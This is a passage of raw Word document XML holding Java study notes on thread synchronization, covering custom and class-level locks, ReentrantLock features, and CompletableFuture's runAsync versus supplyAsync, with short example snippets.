      </w:r>
    </w:p>
    <w:p w14:paraId="7C7D97D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79384B2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Object lock = new Object(); // Custom lock object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA83530" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="730D75C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66C89E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lock) { // Synchronize using the lock object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF2E2F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3CFB0B15"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E4F22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B2BA87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14EB1B07"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a custom lock?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7892B1"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helps in achieving finer-grained control over which resources or sections of code are synchronized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0948CD72"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Class-level Lock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FE48A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f you want to synchronize on the class level (static synchronization), you can use the Class object of the class itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E354DD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3DF8D70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yStaticMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5ED7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MyClass.class) { // Synchronize on the class object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67768D0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A0DEA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2F0456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26A3BC3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775E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MyClass.class?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6875C3CA"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is useful for synchronizing static methods or shared resources that belong to the class, rather than an instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E507E9"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allows all threads to synchronize on the same class-level lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556D1BDB"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ReentrantLock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D292D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synchronized blocks, you can use ReentrantLock from the java.util.concurrent.locks package for more advanced synchronization mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A57829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Lock;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A38CD5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ReentrantLock;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502971B2" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60FB884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2CA760E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Lock lock = new ReentrantLock(); // Lock object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3E8E90" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EFE6B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C7270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lock();  // Acquire the lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D590B8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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1C88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DB20D5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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B754D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unlock();  // Ensure the lock is released</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3EB4D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6AB81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C8C5CD6"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D24CD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lastRenderedPageBreak/>
        <w:t>Why use ReentrantLock?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DBB34C"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ReentrantLock provides more flexibility than the synchronized keyword. It allows features like try-lock, timed lock, or interruptible lock attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647A2B7F"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It is more suitable when you need more control over locking behavior than the synchronized block offers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE38C84" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D928B94" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1262"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized(this)</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEAFA9C" w14:textId="0292903E" w:rsidR="00383507" w:rsidRPr="00CE4B95" w:rsidRDefault="00383507">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="306" w:name="_Toc197867520"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="006E0EC1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>run</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 vs supply</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w:t>
      </w:r>
      <w:bookmarkEnd w:id="306"/>
    </w:p>
    <w:p w14:paraId="2FF6D5D6" w14:textId="4E810261" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC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fference between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CE4B95" w:rsidRDefault="00D15061" w:rsidP="006E0EC1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B7630DC"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upplyAsync()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D231E6C" w14:textId="77777777" w:rsidR="004053D9" w:rsidRPr="00CE4B95" w:rsidRDefault="004053D9" w:rsidP="006E0EC1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703D31A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returns a result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A6A35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Use this method when you need to perform an asynchronous operation that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>computes a val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es a result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA60FAF" w14:textId="77777777" w:rsidR="009C2101" w:rsidRPr="00CE4B95" w:rsidRDefault="009C2101" w:rsidP="006E0EC1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BAC6126" w14:textId="77777777" w:rsidR="009C2101" w:rsidRPr="00CE4B95" w:rsidRDefault="009C2101" w:rsidP="006E0EC1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E0DD67"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651B0F3B"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futur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upplyAsync</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2442B1"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imulate some computation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1F6E99"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42</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE2A572"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6600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0143A5AA" w14:textId="789A164D"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enAccep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esult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Resul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Result: 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C4F23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Pr="00CE4B95" w:rsidRDefault="00303C02" w:rsidP="006E0EC1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="388C326B" w14:textId="47979EFA"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unAsync()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5289E9A7" w14:textId="77777777" w:rsidR="00BF5C2D" w:rsidRPr="00CE4B95" w:rsidRDefault="00BF5C2D" w:rsidP="006E0EC1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75770CE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does not return a result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7338136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Void&gt; since there's no result being returned (void).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494D2385"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CEC47D7"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CompletableFuture&lt;Void&gt; future = CompletableFuture.runAsync(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8CB9E0"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 Simulate some work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C3BE1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System.out.println("Task is running asynchronously");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54611C0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78705593" w14:textId="09BED7C6"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p w14:paraId="4FF5A27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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CAF229"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when you need to execute an asynchronous task that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>returns a result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2F761C" w14:textId="34253E11"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T&gt;, where T is the result of the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD3039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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6289840A"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execute an asynchronous task that does not return a result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473A8CF2" w14:textId="5004C86B"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CE4B9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Both methods run tasks asynchronously, but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handles tasks that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>produce a result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, while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CE4B95"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6" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32842FFD" w14:textId="31770733" w:rsidR="000753D5" w:rsidRPr="00CE4B95" w:rsidRDefault="000753D5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="307" w:name="_Toc197867521"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Reentrant</w:t>
      </w:r>
      <w:r w:rsidR="00FA6169" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ock in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="307"/>
    </w:p>
    <w:p w14:paraId="27CC929E" w14:textId="52B7902A" w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00825CFF" w:rsidP="005E228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in Java is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutual exclusion lock (mutex)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.concurrent.locks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package. It provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>explicit locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Pr="00CE4B95" w:rsidRDefault="00475A57" w:rsidP="00825CFF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13897F7D" w14:textId="03025D8B"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ReentrantLock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C21C1F6" w14:textId="77777777" w:rsidR="00DC31F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC31F0" w:rsidP="00825CFF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CECA02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entrant Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC7AA9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hread that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>already holds the lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can acquire it again </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>without getting blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E7465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ame behavior as the synchronized block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D81F3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the lock maintains a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hold count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which tracks how many times the current thread has acquired the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2105E6" w14:textId="77777777" w:rsidR="00475A57" w:rsidRPr="00CE4B95" w:rsidRDefault="00475A57" w:rsidP="00825CFF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C612EF7"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Reentran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p>
    <w:p w14:paraId="3753BCE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3D26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p>
    <w:p w14:paraId="362B680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428745"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254C3AC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entrant call (same thread)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7877E6E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1A9AC"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sted critical section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E36F43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4B050"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1F2CB2F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DABFF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043C5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2D29DA23" w14:textId="57B4FA88"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p>
    <w:p w14:paraId="233740E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Lock/Unlock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C0CE8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like synchronized, you must </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manually acquire and release</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the lock using lock() and unlock().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BF11B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y Lock (Non-blocking):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20701B2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 lets a thread </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>try to acquire the lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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565B4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F84DFE"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 something</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4E0A4"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AC5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5836A140"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FC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6A131"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ld not get the lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4889010E" w14:textId="6BECA36A"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A47A2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d Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEDFA6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long timeout, TimeUnit unit) allows a thread to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wait for a certain period</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to acquire the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093615BF"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ED082A"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5F33E8"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495746D6"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456DD0"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669297E1"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CFFA42" w14:textId="3B27DF6D"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3484D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ruptible Lock Acquisition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D8DCC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kInterruptibly() allows a thread to be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interrupted</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> while waiting to acquire the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6D49D3" w14:textId="67BC7B6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kInterruptibly</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467F13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 Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141F029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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fair ReentrantLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
